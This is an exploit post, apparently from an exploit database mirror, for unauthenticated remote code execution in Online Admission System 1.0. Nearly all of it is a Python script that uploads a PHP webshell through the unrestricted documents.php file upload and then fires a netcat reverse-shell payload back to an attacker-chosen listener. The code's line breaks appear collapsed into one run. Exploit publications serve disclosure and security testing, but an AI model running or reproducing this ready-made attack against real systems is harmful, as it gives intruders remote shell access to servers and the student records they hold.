[webapps] Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)

4 months ago 29
# Exploit Title: Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Date: 23/12/2021 # Exploit Author: Jeremiasz Pluta # Vendor Homepage: https://github.com/rskoolrash/Online-Admission-System # Software Link: https://github.com/rskoolrash/Online-Admission-System # Tested on: LAMP Stack (Debian 10) #!/usr/bin/python import sys import re import argparse import requests import time import subprocess print('Exploit for Online Admission System 1.0 - Remote Code Execution (Unauthenticated)') path = '/' #change me if the path to the /oas is in the root directory or another subdir class Exploit: def __init__(self, target_ip, target_port, localhost, localport): self.target_ip = target_ip self.target_port = target_port self.localhost = localhost self.localport = localport def exploitation(self): payload = """<?php system($_GET['cmd']); ?>""" payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f""" url = 'http://' + target_ip + ':' + target_port + path r = requests.Session() print('[*] Resolving URL...') r1 = r.get(url + 'documents.php') time.sleep(3) #Upload the payload file print('[*] Uploading the webshell payload...') files = { 'fpic': ('cmd.php', payload + '\n', 'application/x-php'), 'ftndoc': ('', '', 'application/octet-stream'), 'ftcdoc': ('', '', 'application/octet-stream'), 'fdmdoc': ('', '', 'application/octet-stream'), 'ftcdoc': ('', '', 'application/octet-stream'), 'fdcdoc': ('', '', 'application/octet-stream'), 'fide': ('', '', 'application/octet-stream'), 'fsig': ('', '', 'application/octet-stream'), } data = {'fpicup':'Submit Query'} r2 = r.post(url + 'documents.php', files=files, allow_redirects=True, data=data) time.sleep(3) print('[*] Setting up netcat listener...') listener = subprocess.Popen(["nc", "-nvlp", self.localport]) time.sleep(3) print('[*] Spawning reverse shell...') print('[*] Watchout!') r3 = r.get(url + '/studentpic/cmd.php?cmd=' + payload2) time.sleep(3) if (r3.status_code == 200): print('[*] Got shell!') while True: listener.wait() else: print('[-] Something went wrong!') listener.terminate() def get_args(): parser = argparse.ArgumentParser(description='Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)') parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP') parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port') parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP') parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port') args = parser.parse_args() return args args = get_args() target_ip = args.url target_port = args.target_port localhost = args.localhost localport = args.localport exp = Exploit(target_ip, target_port, localhost, localport) exp.exploitation()
Read Entire Article